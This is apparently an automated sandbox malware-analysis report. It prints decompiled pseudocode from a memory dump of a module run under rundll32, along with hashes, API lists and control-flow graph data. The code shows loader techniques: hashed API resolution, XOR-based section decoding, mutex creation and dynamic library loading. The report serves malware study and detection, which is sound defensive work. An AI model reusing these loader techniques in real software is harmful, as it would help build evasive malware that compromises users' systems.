                          • Source File: 00000005.00000002.388496424.000001F71CC00000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F71CC00000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_1f71cc00000_rundll32.jbxd
                          Similarity
                          • API ID: File$CreateDirectoryErrorLastQuery
                          • String ID:
                          • API String ID: 2967190759-0
                          • Opcode ID: f814dd8b6d3da2fcbfd4e7d7d81ec7b5df8dd2866cc2a168341a68cf2791420f
                          • Instruction ID: 638ad4733b243deb6b0064b4fda0812dc010ca242fc9818e38cfc90f8be913ee
                          • Opcode Fuzzy Hash: f814dd8b6d3da2fcbfd4e7d7d81ec7b5df8dd2866cc2a168341a68cf2791420f
                          • Instruction Fuzzy Hash: 4041A03630CB8186FB508F96A4413EA62A0F7CCB90F1846359E9D83BC6CF39D8698710
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          C-Code - Quality: 34%
                          			E000001F71F71CC04DB4(long long __rbx, long long __rcx, long long __rdi, long long __rsi, void* __r9, void* __r11) {
                          				intOrPtr _t22;
                          				intOrPtr _t23;
                          				void* _t30;
                          				long long _t55;
                          				void* _t71;
                          				intOrPtr* _t74;
                          				intOrPtr* _t75;
                          				long long _t81;
                          				long long _t82;
                          				long long _t84;
                          				void* _t90;
                          				long _t92;
                          				long _t94;
                          				long _t96;
                          
                          				_t90 = __r9;
                          				_t55 = _t84;
                          				 *((long long*)(_t55 + 8)) = __rbx;
                          				 *((long long*)(_t55 + 0x10)) = _t81;
                          				 *((long long*)(_t55 + 0x18)) = __rsi;
                          				 *((long long*)(_t55 + 0x20)) = __rdi;
                          				_t82 = __rcx;
                          				r8d = 0;
                          				HeapCreate(_t96, _t94, _t92); // executed
                          				if (_t55 == 0) goto 0x1cc04f03;
                          				_t71 =  *((intOrPtr*)(__rcx + 0x3c)) + __rcx;
                          				_t74 = _t55 + _t71 + 0x68;
                          				_t22 =  *_t74;
                          				if (_t22 == 0) goto 0x1cc04e94;
                          				if (_t22 == 0x7373622e) goto 0x1cc04e22;
                          				_t75 = _t74 + 0x28;
                          				_t23 =  *_t75;
                          				if (_t23 != 0) goto 0x1cc04e11;
                          				if (_t23 == 0) goto 0x1cc04e94;
                          				r13d =  *(_t75 + 0x10);
                          				r12d =  *(_t75 + 0x14);
                          				r12d = r12d ^  *(_t71 + 8);
                          				r12d = r12d ^ r13d;
                          				HeapAlloc(??, ??, ??);
                          				if (_t55 == 0) goto 0x1cc04e8d;
                          				r9d = r12d;
                          				r8d = r13d;
                          				E000001F71F71CC0111C(_t55, _t55, __rbx, _t55, _t71 + __rcx);
                          				r11d =  *((intOrPtr*)(_t75 + 0xc));
                          				 *0x1cc0d448 = _t55 - __r11 - _t82;
                          				 *0x1cc0d450 = E000001F71F71CC016FC(_t55, _t55 - __r11 - _t82 + 0x1cc11040);
                          				goto 0x1cc04e99;
                          				goto 0x1cc04e99;
                          				if (2 == 0) goto 0x1cc04ea8;
                          				HeapDestroy(??);
                          				goto 0x1cc04f03;
                          				HeapAlloc(??, ??, ??);
                          				if (0x1cc11040 != 0) goto 0x1cc04ee1;
                          				HeapDestroy(??);
                          				goto 0x1cc04f03;
                          				0x1cc0487a();
                          				 *0x1F71CC11048 = _t55;
                          				 *0x1cc0d458 = 0x1cc11040; // executed
                          				_t30 = E000001F71F71CC037E0(0x1cc11040, _t82, _t90); // executed
                          				return _t30;
                          			}

















                          0x1f71cc04db4
                          0x1f71cc04db4
                          0x1f71cc04db7
                          0x1f71cc04dbb
                          0x1f71cc04dbf
                          0x1f71cc04dc3
                          0x1f71cc04dd1
                          0x1f71cc04dd4
                          0x1f71cc04de3
                          0x1f71cc04def
                          0x1f71cc04dfb
                          0x1f71cc04e02
                          0x1f71cc04e07
                          0x1f71cc04e0b
                          0x1f71cc04e16
                          0x1f71cc04e18
                          0x1f71cc04e1c
                          0x1f71cc04e20
                          0x1f71cc04e24
                          0x1f71cc04e26
                          0x1f71cc04e2a
                          0x1f71cc04e31
                          0x1f71cc04e3a
                          0x1f71cc04e3d
                          0x1f71cc04e49
                          0x1f71cc04e4e
                          0x1f71cc04e51
                          0x1f71cc04e5a
                          0x1f71cc04e5f
                          0x1f71cc04e75
                          0x1f71cc04e85
                          0x1f71cc04e8b
                          0x1f71cc04e92
                          0x1f71cc04e9b
                          0x1f71cc04ea0
                          0x1f71cc04ea6
                          0x1f71cc04ec3
                          0x1f71cc04ecf
                          0x1f71cc04ed4
                          0x1f71cc04edf
                          0x1f71cc04ee9
                          0x1f71cc04eee
                          0x1f71cc04ef5
                          0x1f71cc04efc
                          0x1f71cc04f23

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.388496424.000001F71CC00000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F71CC00000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_1f71cc00000_rundll32.jbxd
                          Similarity
                          • API ID: Heap$AllocDestroy$Create
                          • String ID: .bss
                          • API String ID: 388876957-3890483948
                          • Opcode ID: f2c7b615a138f4c90b95f00cc2a562d4e42a46c6d73442d59f831ff1248fe2d1
                          • Instruction ID: eb68c94d9d59d92f7e67c8326f17d40a883aadf9b0fed0b389888e4e32ac8a56
                          • Opcode Fuzzy Hash: f2c7b615a138f4c90b95f00cc2a562d4e42a46c6d73442d59f831ff1248fe2d1
                          • Instruction Fuzzy Hash: E2414C7970CB4286FB14CF9699403EAA7A1F788B94F1484359E5947BD5DE38DCAAC300
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          C-Code - Quality: 29%
                          			E000001F71F71CC0A7A0(void* __edi, long long* __rax, long long __rbx, intOrPtr* __rcx, void* __rdx, void* __r9, long long _a8, char _a16, char _a24) {
                          				intOrPtr _v56;
                          				void* _v64;
                          				intOrPtr _v72;
                          				long long _v88;
                          				void* __rsi;
                          				void* __rbp;
                          				long long* _t58;
                          				long long* _t59;
                          				long long _t60;
                          				long long _t75;
                          				intOrPtr* _t87;
                          
                          				_t60 = __rbx;
                          				_t58 = __rax;
                          				_a8 = __rbx;
                          				_t76 =  *0x1cc0d458;
                          				_t87 = __rcx;
                          				_v72 = 0x18;
                          				_v56 = 0;
                          				E000001F71F71CC0908C(0xe9f8f8df, __rax,  *((intOrPtr*)( *0x1cc0d458 + 0x20)));
                          				if (_t58 == __rbx) goto 0x1cc0a804;
                          				r9d = 0; // executed
                          				 *_t58(); // executed
                          				goto 0x1cc0a806;
                          				if (0 == 0) goto 0x1cc0a8d2;
                          				r9d = 0;
                          				_a16 =  *__rcx;
                          				_t59 =  &_a24;
                          				_v88 = _t59;
                          				E000001F71F71CC01000(__edi, _t59, __rbx,  &_a16,  *0x1cc0d458, 0x1f71cc00000,  *0x1cc0d448 + 0x1f71cc11178);
                          				if (_t59 == _t60) goto 0x1cc0a8d2;
                          				E000001F71F71CC0908C(0x3ff22481, _t59,  *((intOrPtr*)( *0x1cc0d458 + 0x18)));
                          				if (_t59 == _t60) goto 0x1cc0a875;
                          				CreateMutexW(??, ??, ??); // executed
                          				goto 0x1cc0a878;
                          				_t75 = _t60;
                          				if (_t75 == _t60) goto 0x1cc0a8c4;
                          				E000001F71F71CC0908C(0xc06f8334, _t59,  *((intOrPtr*)( *0x1cc0d458 + 0x18)));
                          				if (_t59 == _t60) goto 0x1cc0a894;
                          				 *_t59();
                          				goto 0x1cc0a899;
                          				if (0x7f != 0xb7) goto 0x1cc0a8ba;
                          				E000001F71F71CC0908C(0xa219a077, _t59,  *((intOrPtr*)(_t76 + 0x18)));
                          				if (_t59 == _t60) goto 0x1cc0a8c4;
                          				FindCloseChangeNotification(??); // executed
                          				goto 0x1cc0a8c4;
                          				 *((long long*)(_t87 + 0x18)) = _t75;
                          				HeapFree(??, ??, ??);
                          				return 1;
                          			}














                          0x1f71cc0a7a0
                          0x1f71cc0a7a0
                          0x1f71cc0a7a0
                          0x1f71cc0a7b0
                          0x1f71cc0a7be
                          0x1f71cc0a7c5
                          0x1f71cc0a7cf
                          0x1f71cc0a7dc
                          0x1f71cc0a7eb
                          0x1f71cc0a7fd
                          0x1f71cc0a800
                          0x1f71cc0a802
                          0x1f71cc0a808
                          0x1f71cc0a812
                          0x1f71cc0a81d
                          0x1f71cc0a824
                          0x1f71cc0a838
                          0x1f71cc0a83d
                          0x1f71cc0a848
                          0x1f71cc0a857
                          0x1f71cc0a85f
                          0x1f71cc0a86e
                          0x1f71cc0a873
                          0x1f71cc0a875
                          0x1f71cc0a87b
                          0x1f71cc0a886
                          0x1f71cc0a88e
                          0x1f71cc0a890
                          0x1f71cc0a892
                          0x1f71cc0a89e
                          0x1f71cc0a8a9
                          0x1f71cc0a8b1
                          0x1f71cc0a8b6
                          0x1f71cc0a8b8
                          0x1f71cc0a8ba
                          0x1f71cc0a8cc
                          0x1f71cc0a8e7

                          APIs
                          Memory Dump Source
                          • Source File: 00000005.00000002.388496424.000001F71CC00000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F71CC00000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_1f71cc00000_rundll32.jbxd
                          Similarity
                          • API ID: DescriptorSecurity$ChangeCloseConvertCreateErrorFindFreeHeapLastMutexNotificationString
                          • String ID:
                          • API String ID: 2727274001-0
                          • Opcode ID: 094b80e17cbc27acdaa4bcb602713c3cf38535d7203a15ce1a2febed987810e0
                          • Instruction ID: 150acc5e64330617e052ae17a44898955c08a4211dec84945238b659ef8a8bdc
                          • Opcode Fuzzy Hash: 094b80e17cbc27acdaa4bcb602713c3cf38535d7203a15ce1a2febed987810e0
                          • Instruction Fuzzy Hash: CF31B23A60CA8696FB60DF95E4417EA63A0F388784F4846319E8D437C5DE38D9AFC750
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          APIs
                          Memory Dump Source
                          • Source File: 00000005.00000002.388496424.000001F71CC00000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F71CC00000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_1f71cc00000_rundll32.jbxd
                          Similarity
                          • API ID: AllocHeap
                          • String ID:
                          • API String ID: 4292702814-0
                          • Opcode ID: d90c455f1f88f64b94d8e0ef723daeee3f7b076c1a4ed74ada8051636fd5944d
                          • Instruction ID: eae92ebb1582e55716dae4de17a8959e45537442abdcc3d177a3cc95dd957856
                          • Opcode Fuzzy Hash: d90c455f1f88f64b94d8e0ef723daeee3f7b076c1a4ed74ada8051636fd5944d
                          • Instruction Fuzzy Hash: 89518F7660CF9086E764CF45F444BAEB7A4F784B94F119129EE8943B94DB38C8A5CB00
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          C-Code - Quality: 29%
                          			E000001F71F71CC05FC8(long long* __rax, long long __rbx, void* __rcx, long long* __rdx, long long __rsi, long long __rbp, long long _a8, long long _a16, void* _a24, long long _a32) {
                          				long long* _t32;
                          				long long* _t35;
                          				long long _t41;
                          				void* _t56;
                          				void* _t57;
                          
                          				_t32 = __rax;
                          				_a8 = __rbx;
                          				_a16 = __rbp;
                          				_a32 = __rsi;
                          				_t48 =  *0x1cc0d458;
                          				E000001F71F71CC0908C(0x2d4b080e, __rax,  *((intOrPtr*)( *0x1cc0d458 + 0x18)));
                          				if (_t32 == 0) goto 0x1cc06006;
                          				LoadLibraryA(??); // executed
                          				_t35 = _t32;
                          				goto 0x1cc06008;
                          				if (_t35 == 0) goto 0x1cc06048;
                          				if (E000001F71F71CC040F8(_t35,  &_a24, _t56, _t57) != 0) goto 0x1cc0602e;
                          				_t41 = _a24;
                          				 *_t41 = _t35;
                          				 *__rdx = _t41;
                          				goto 0x1cc06066;
                          				E000001F71F71CC0908C(0xc8e2960c, _t32,  *((intOrPtr*)( *0x1cc0d458 + 0x18)));
                          				if (_t32 == 0) goto 0x1cc06066;
                          				 *_t32();
                          				goto 0x1cc06066;
                          				E000001F71F71CC0908C(0xc06f8334, _t32,  *((intOrPtr*)(_t48 + 0x18)));
                          				if (_t32 == 0) goto 0x1cc06061;
                          				 *_t32();
                          				goto 0x1cc06066;
                          				return 0x7f;
                          			}








                          0x1f71cc05fc8
                          0x1f71cc05fc8
                          0x1f71cc05fcd
                          0x1f71cc05fd2
                          0x1f71cc05fdc
                          0x1f71cc05ff2
                          0x1f71cc05ffa
                          0x1f71cc05fff
                          0x1f71cc06001
                          0x1f71cc06004
                          0x1f71cc0600b
                          0x1f71cc0601e
                          0x1f71cc06020
                          0x1f71cc06025
                          0x1f71cc06028
                          0x1f71cc0602c
                          0x1f71cc06037
                          0x1f71cc0603f
                          0x1f71cc06044
                          0x1f71cc06046
                          0x1f71cc06051
                          0x1f71cc06059
                          0x1f71cc0605b
                          0x1f71cc0605f
                          0x1f71cc0607c

                          APIs
                            • Part of subcall function 000001F71CC0908C: SetLastError.KERNEL32 ref: 000001F71CC090C8
                          • LoadLibraryA.KERNELBASE(?,?,00000000,000001F71CC08947,?,?,?,?,?,000001F71CC09D9C), ref: 000001F71CC05FFF
                          Memory Dump Source
                          • Source File: 00000005.00000002.388496424.000001F71CC00000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F71CC00000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_1f71cc00000_rundll32.jbxd
                          Similarity
                          • API ID: ErrorLastLibraryLoad
                          • String ID:
                          • API String ID: 3568775529-0
                          • Opcode ID: 99d26a6194f647cbc272d2d1eeaeaa4141e7c0158a623e847e66b8beeb9b8dfc
                          • Instruction ID: 31608f00ae5b89e315e20baea4ebdaabb8b7c2f34320dd3b81c1440d5fa22241
                          • Opcode Fuzzy Hash: 99d26a6194f647cbc272d2d1eeaeaa4141e7c0158a623e847e66b8beeb9b8dfc
                          • Instruction Fuzzy Hash: D311637A35DF4286FA209F91A5403FA5260A7CCBC4F2C4431AE8E477C6DE39DD668320
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          C-Code - Quality: 73%
                          			_entry_(void* __ecx, void* __edx, long long __rcx, void* __r8) {
                          				void* __rbx;
                          				void* _t2;
                          				long long* _t15;
                          				long long _t16;
                          				void* _t20;
                          				long long _t21;
                          				long long _t22;
                          				void* _t24;
                          				void* _t25;
                          
                          				_t17 = __rcx;
                          				if (__edx == 0) goto 0x1cc0697b;
                          				if (__edx != 1) goto 0x1cc06998;
                          				_t20 = __r8; // executed
                          				_t2 = E000001F71F71CC04DB4(_t16, __rcx, _t21, _t22, _t24, _t25); // executed
                          				if (_t2 == 0) goto 0x1cc06998;
                          				goto 0x1cc06998;
                          				E000001F71F71CC06CE4(_t15, _t16, _t17, _t20, _t22);
                          				if ( *0x1cc0d458 == 0) goto 0x1cc06998;
                          				HeapDestroy(??); // executed
                          				return 0;
                          			}












                          0x1f71cc06958
                          0x1f71cc06965
                          0x1f71cc06969
                          0x1f71cc0696b
                          0x1f71cc0696e
                          0x1f71cc06975
                          0x1f71cc06979
                          0x1f71cc0697d
                          0x1f71cc0698c
                          0x1f71cc06992
                          0x1f71cc0699f

                          APIs
                          Memory Dump Source
                          • Source File: 00000005.00000002.388496424.000001F71CC00000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F71CC00000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_1f71cc00000_rundll32.jbxd
                          Similarity
                          • API ID: Heap$Destroy$AllocCreate
                          • String ID:
                          • API String ID: 3351204586-0
                          • Opcode ID: a4400d5fb00ce8b202e985b99d74023a3441fb4740ac843efecc6f335352d400
                          • Instruction ID: 8707ce83e78fae92eaad38a1eac981a03bdf523f0ef26e53f249084544b06f33
                          • Opcode Fuzzy Hash: a4400d5fb00ce8b202e985b99d74023a3441fb4740ac843efecc6f335352d400
                          • Instruction Fuzzy Hash: E6E01A7871DE4341FF689EE695913FA42909B85744F7858398D07466C6CE18DCADC220
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 291 1f71cc06df0-1f71cc06e42 call 1f71cc091c8 294 1f71cc06e48-1f71cc06e6b 291->294 295 1f71cc07239 291->295 297 1f71cc0703b 294->297 298 1f71cc06e71-1f71cc06e86 call 1f71cc0908c 294->298 296 1f71cc0723e-1f71cc07257 295->296 300 1f71cc07040-1f71cc07055 HeapFree 297->300 304 1f71cc06e88-1f71cc06e8d 298->304 305 1f71cc06e8f 298->305 300->296 302 1f71cc0705b-1f71cc0707b call 1f71cc091c8 300->302 302->295 308 1f71cc07081-1f71cc0709e call 1f71cc0672c 302->308 307 1f71cc06e91-1f71cc06eae HeapAlloc 304->307 305->307 310 1f71cc0722f-1f71cc07234 307->310 311 1f71cc06eb4-1f71cc06ecc call 1f71cc047b0 307->311 317 1f71cc070a8-1f71cc070cb call 1f71cc091c8 308->317 318 1f71cc070a0-1f71cc070a2 308->318 310->300 316 1f71cc06ed0-1f71cc06ed4 311->316 319 1f71cc06edc-1f71cc06edf 316->319 320 1f71cc06ed6-1f71cc06eda 316->320 326 1f71cc070d1-1f71cc07100 call 1f71cc0908c 317->326 327 1f71cc07166-1f71cc07189 call 1f71cc091c8 317->327 318->295 318->317 319->316 320->319 322 1f71cc06ee1-1f71cc06ee5 320->322 324 1f71cc06eeb-1f71cc06efa call 1f71cc0908c 322->324 325 1f71cc06f74 322->325 336 1f71cc06efc-1f71cc06f01 324->336 337 1f71cc06f03 324->337 331 1f71cc06f76 325->331 338 1f71cc07109-1f71cc0711e call 1f71cc047b0 326->338 339 1f71cc07102 326->339 327->296 340 1f71cc0718f-1f71cc071a5 call 1f71cc0672c 327->340 335 1f71cc06f7e-1f71cc06f80 331->335 341 1f71cc07021-1f71cc07033 HeapFree 335->341 342 1f71cc06f86-1f71cc06f9f call 1f71cc0908c 335->342 343 1f71cc06f05-1f71cc06f25 HeapAlloc 336->343 337->343 354 1f71cc07120-1f71cc0712f call 1f71cc0487a 338->354 355 1f71cc07134-1f71cc07145 call 1f71cc0908c 338->355 339->338 340->296 357 1f71cc071ab-1f71cc071b4 340->357 341->297 352 1f71cc06fa8-1f71cc06fc5 342->352 353 1f71cc06fa1 342->353 343->331 349 1f71cc06f27 343->349 356 1f71cc06f2a-1f71cc06f32 349->356 360 1f71cc06fc7 352->360 361 1f71cc06fcb-1f71cc06fe1 call 1f71cc0908c 352->361 353->352 354->355 375 1f71cc07147 355->375 376 1f71cc0714e-1f71cc0715e HeapFree 355->376 363 1f71cc06f34-1f71cc06f37 356->363 364 1f71cc06f46 356->364 357->296 358 1f71cc071ba-1f71cc071d5 call 1f71cc0908c 357->358 377 1f71cc071d7 358->377 378 1f71cc071de-1f71cc071ef call 1f71cc0908c 358->378 360->361 380 1f71cc06fea-1f71cc06fed 361->380 381 1f71cc06fe3 361->381 365 1f71cc06f39-1f71cc06f40 363->365 366 1f71cc06f42-1f71cc06f44 363->366 368 1f71cc06f48-1f71cc06f4b 364->368 365->363 365->366 366->364 366->368 372 1f71cc06f4d-1f71cc06f50 368->372 373 1f71cc06f62-1f71cc06f70 368->373 379 1f71cc06f53-1f71cc06f56 372->379 373->356 382 1f71cc06f72 373->382 375->376 376->327 377->378 389 1f71cc071f8-1f71cc07224 call 1f71cc0908c 378->389 390 1f71cc071f1 378->390 384 1f71cc06f58-1f71cc06f5b 379->384 385 1f71cc06f5d-1f71cc06f60 379->385 386 1f71cc06fef-1f71cc0700a HeapFree * 2 380->386 387 1f71cc07010-1f71cc0701f 380->387 381->380 382->335 384->373 384->385 385->379 386->387 387->300 389->296 393 1f71cc07226-1f71cc0722d 389->393 390->389 393->296
                          C-Code - Quality: 35%
                          			E000001F71F71CC06DF0(long long __rbx, intOrPtr* __rcx, long long __rdx) {
                          				void* __rdi;
                          				void* __rsi;
                          				void* __rbp;
                          				void* _t96;
                          				void* _t116;
                          				void* _t121;
                          				intOrPtr _t123;
                          				void* _t130;
                          				char _t131;
                          				void* _t156;
                          				long long* _t198;
                          				long long* _t199;
                          				long long* _t201;
                          				char* _t218;
                          				char* _t219;
                          				long _t252;
                          				intOrPtr* _t253;
                          				long _t255;
                          				void* _t260;
                          				char* _t262;
                          				long long _t263;
                          				signed long long _t269;
                          				void* _t271;
                          				void* _t272;
                          				void* _t292;
                          				void* _t293;
                          				long _t300;
                          				long _t305;
                          				void* _t307;
                          
                          				_t292 = _t271;
                          				 *((long long*)(_t292 + 8)) = __rbx;
                          				 *((long long*)(_t292 + 0x10)) = __rdx;
                          				_t272 = _t271 - 0x40;
                          				r14d =  *0x1cc0d450;
                          				_t253 = __rcx;
                          				 *((long long*)(_t272 + 0x38)) =  *((intOrPtr*)( *0x1cc0d458 + 8));
                          				if (E000001F71F71CC091C8(_t121, r14d ^ 0x55e7ce26,  *((intOrPtr*)( *0x1cc0d458 + 8)), __rbx, __rdx, __rdx, __rcx, _t255, _t292 - 0x58, _t292 + 0x18, _t292) != 0) goto 0x1cc07239;
                          				_t198 =  *_t253;
                          				 *((long long*)(_t272 + 0x98)) = _t198;
                          				 *((long long*)(_t272 + 0x30)) =  *((intOrPtr*)( *0x1cc0d458 + 8));
                          				if ( *((intOrPtr*)(_t272 + 0x20)) == 0) goto 0x1cc0703b;
                          				r13d = 0xfb849f8f;
                          				E000001F71F71CC0908C(r13d, _t198,  *((intOrPtr*)( *0x1cc0d458 + 0x18)));
                          				if (_t198 == 0) goto 0x1cc06e8f;
                          				 *_t198();
                          				goto 0x1cc06e91;
                          				r8d = 1;
                          				HeapAlloc(_t307, _t305, _t300);
                          				 *((long long*)(_t272 + 0x28)) = _t198;
                          				if (_t198 == 0) goto 0x1cc0722f;
                          				0x1cc047b0();
                          				_t262 = _t198;
                          				if ( *_t262 == 0x20) goto 0x1cc06edc;
                          				if ( *_t262 != 9) goto 0x1cc06ee1;
                          				_t263 = _t262 + 1;
                          				goto 0x1cc06ed0;
                          				if ( *_t263 == 0) goto 0x1cc06f74;
                          				E000001F71F71CC0908C(r13d, _t198,  *((intOrPtr*)( *0x1cc0d458 + 0x18)));
                          				if (_t198 == 0) goto 0x1cc06f03;
                          				 *_t198();
                          				goto 0x1cc06f05;
                          				asm("cdq");
                          				_t15 = _t198 + 1; // 0x1
                          				r8d = _t15;
                          				HeapAlloc(_t293, _t252, _t255);
                          				if (_t198 == 0) goto 0x1cc06f76;
                          				_t130 =  *_t263;
                          				if (_t130 == 0) goto 0x1cc06f46;
                          				if (_t130 == 0x20) goto 0x1cc06f42;
                          				_t218 = _t263 + 1;
                          				_t131 =  *_t218;
                          				if (_t131 != 0) goto 0x1cc06f34;
                          				if (_t131 != 0) goto 0x1cc06f48;
                          				if (_t218 == 0) goto 0x1cc06f62;
                          				 *_t218 = 0;
                          				_t219 = _t218 + 1;
                          				if ( *_t219 == 0x20) goto 0x1cc06f5d;
                          				if ( *_t219 != 9) goto 0x1cc06f62;
                          				goto 0x1cc06f53;
                          				 *_t198 = _t263;
                          				_t199 = _t198 +  *((intOrPtr*)( *0x1cc0d458 + 8));
                          				if (_t219 + 1 != 0) goto 0x1cc06f2a;
                          				goto 0x1cc06f7e;
                          				if (0 == 0) goto 0x1cc07021;
                          				E000001F71F71CC0908C(0x4a75e5e7, _t199,  *((intOrPtr*)( *0x1cc0d458 + 0x10)));
                          				if (_t199 == 0) goto 0x1cc06fa8;
                          				 *_t199();
                          				 *((long long*)(_t253 + 0x40)) =  *((intOrPtr*)(_t272 + 0x28));
                          				 *((long long*)(_t253 + 0x48)) =  *((intOrPtr*)(_t272 + 0x90));
                          				 *((intOrPtr*)(_t253 + 0x50)) = sil;
                          				if ( *((char*)(_t253 + 0x70)) == 0) goto 0x1cc06fcb;
                          				 *((char*)(_t253 + 0x70)) = 0;
                          				asm("lock and dword [edi+0x2c], 0xfffffffe");
                          				E000001F71F71CC0908C(0x8d72aad2, _t199,  *((intOrPtr*)( *0x1cc0d458 + 0x10)));
                          				if (_t199 == 0) goto 0x1cc06fea;
                          				 *_t199();
                          				if ( *((intOrPtr*)(_t253 + 0x40)) == 0) goto 0x1cc07010;
                          				HeapFree(_t260, ??);
                          				HeapFree(??, ??, ??);
                          				goto 0x1cc07040;
                          				HeapFree(??, ??, ??);
                          				HeapFree(??, ??, ??);
                          				if (0x57 != 0) goto 0x1cc0723e;
                          				if (E000001F71F71CC091C8(0, r14d ^ 0x881e33f6, _t199,  *((intOrPtr*)(_t272 + 0x30)),  *((intOrPtr*)(_t272 + 0x88)),  *((intOrPtr*)(_t272 + 0x20)), _t253, _t198, _t272 + 0x20, _t272 + 0x90, _t292) != 0) goto 0x1cc07239;
                          				_t96 = E000001F71F71CC0672C( *((intOrPtr*)(_t272 + 0x20)),  *((intOrPtr*)(_t272 + 0x20)), _t272 + 0x98);
                          				_t123 =  *((intOrPtr*)(_t272 + 0x98));
                          				if (_t96 != 0) goto 0x1cc070a8;
                          				if (_t123 == 0) goto 0x1cc07239;
                          				 *((intOrPtr*)(_t253 + 0x28)) = _t123;
                          				if (E000001F71F71CC091C8(_t123, r14d ^ 0xa2dd2342, _t199,  *((intOrPtr*)(_t272 + 0x30)),  *((intOrPtr*)(_t272 + 0x88)),  *((intOrPtr*)(_t272 + 0x20)), _t253, _t198, _t272 + 0x20, _t272 + 0x90, _t292) != 0) goto 0x1cc07166;
                          				_t46 = _t199 + 0x10; // 0x10
                          				_t116 = _t46;
                          				_t156 =  <  ?  *((void*)(_t272 + 0x90)) : _t116;
                          				E000001F71F71CC0908C(0x4a75e5e7, _t199,  *((intOrPtr*)( *0x1cc0d458 + 0x10)));
                          				if (_t199 == 0) goto 0x1cc07109;
                          				 *_t199();
                          				r8d = _t156;
                          				0x1cc047b0();
                          				if (_t156 - _t116 >= 0) goto 0x1cc07134;
                          				r8d = _t116 - _t156;
                          				0x1cc0487a();
                          				E000001F71F71CC0908C(0x8d72aad2, _t199,  *((intOrPtr*)( *0x1cc0d458 + 0x10)));
                          				if (_t199 == 0) goto 0x1cc0714e;
                          				 *_t199();
                          				HeapFree(??, ??, ??);
                          				_t269 =  *((intOrPtr*)(_t272 + 0x88));
                          				r14d = r14d ^ 0x1a1a0866;
                          				if (E000001F71F71CC091C8(_t123, r14d, _t199,  *((intOrPtr*)(_t272 + 0x30)), _t269,  *((intOrPtr*)(_t272 + 0x20)), _t253, _t198, _t272 + 0x20, _t272 + 0x90, _t292) != 0) goto 0x1cc0723e;
                          				if (E000001F71F71CC0672C( *((intOrPtr*)(_t272 + 0x20)),  *((intOrPtr*)(_t272 + 0x20)), _t272 + 0x98) == 0) goto 0x1cc0723e;
                          				if ( *((intOrPtr*)(_t272 + 0x98)) == 0) goto 0x1cc0723e;
                          				E000001F71F71CC0908C(0x4a75e5e7, _t199,  *((intOrPtr*)( *0x1cc0d458 + 0x10)));
                          				if (_t199 == 0) goto 0x1cc071de;
                          				 *_t199();
                          				E000001F71F71CC0908C(0x9c66d81c, _t199,  *((intOrPtr*)( *0x1cc0d458 + 0x18)));
                          				if (_t199 == 0) goto 0x1cc071f8;
                          				 *_t199();
                          				_t201 =  *((intOrPtr*)(_t272 + 0x28)) + _t269 * 0x23c34600;
                          				 *((long long*)(_t272 + 0x28)) = _t201;
                          				 *((long long*)(_t253 + 0x30)) = _t201;
                          				E000001F71F71CC0908C(0x8d72aad2, _t201,  *((intOrPtr*)( *0x1cc0d458 + 0x10)));
                          				if (_t201 == 0) goto 0x1cc0723e;
                          				 *_t201();
                          				goto 0x1cc0723e;
                          				goto 0x1cc07040;
                          				return 1;
                          			}
































                          0x1f71cc06df0
                          0x1f71cc06df3
                          0x1f71cc06df7
                          0x1f71cc06e06
                          0x1f71cc06e11
                          0x1f71cc06e22
                          0x1f71cc06e36
                          0x1f71cc06e42
                          0x1f71cc06e54
                          0x1f71cc06e5b
                          0x1f71cc06e63
                          0x1f71cc06e6b
                          0x1f71cc06e75
                          0x1f71cc06e7e
                          0x1f71cc06e86
                          0x1f71cc06e8b
                          0x1f71cc06e8d
                          0x1f71cc06e98
                          0x1f71cc06e9d
                          0x1f71cc06ea6
                          0x1f71cc06eae
                          0x1f71cc06ebd
                          0x1f71cc06ec9
                          0x1f71cc06ed4
                          0x1f71cc06eda
                          0x1f71cc06edc
                          0x1f71cc06edf
                          0x1f71cc06ee5
                          0x1f71cc06ef2
                          0x1f71cc06efa
                          0x1f71cc06eff
                          0x1f71cc06f01
                          0x1f71cc06f05
                          0x1f71cc06f0f
                          0x1f71cc06f0f
                          0x1f71cc06f17
                          0x1f71cc06f25
                          0x1f71cc06f2a
                          0x1f71cc06f32
                          0x1f71cc06f37
                          0x1f71cc06f39
                          0x1f71cc06f3c
                          0x1f71cc06f40
                          0x1f71cc06f44
                          0x1f71cc06f4b
                          0x1f71cc06f4d
                          0x1f71cc06f50
                          0x1f71cc06f56
                          0x1f71cc06f5b
                          0x1f71cc06f60
                          0x1f71cc06f62
                          0x1f71cc06f67
                          0x1f71cc06f70
                          0x1f71cc06f72
                          0x1f71cc06f80
                          0x1f71cc06f8f
                          0x1f71cc06f9f
                          0x1f71cc06fa6
                          0x1f71cc06fb5
                          0x1f71cc06fb9
                          0x1f71cc06fbd
                          0x1f71cc06fc5
                          0x1f71cc06fc7
                          0x1f71cc06fcb
                          0x1f71cc06fd9
                          0x1f71cc06fe1
                          0x1f71cc06fe8
                          0x1f71cc06fed
                          0x1f71cc06ffc
                          0x1f71cc0700a
                          0x1f71cc0701f
                          0x1f71cc0702d
                          0x1f71cc0704d
                          0x1f71cc07055
                          0x1f71cc0707b
                          0x1f71cc07090
                          0x1f71cc07095
                          0x1f71cc0709e
                          0x1f71cc070a2
                          0x1f71cc070ab
                          0x1f71cc070cb
                          0x1f71cc070db
                          0x1f71cc070db
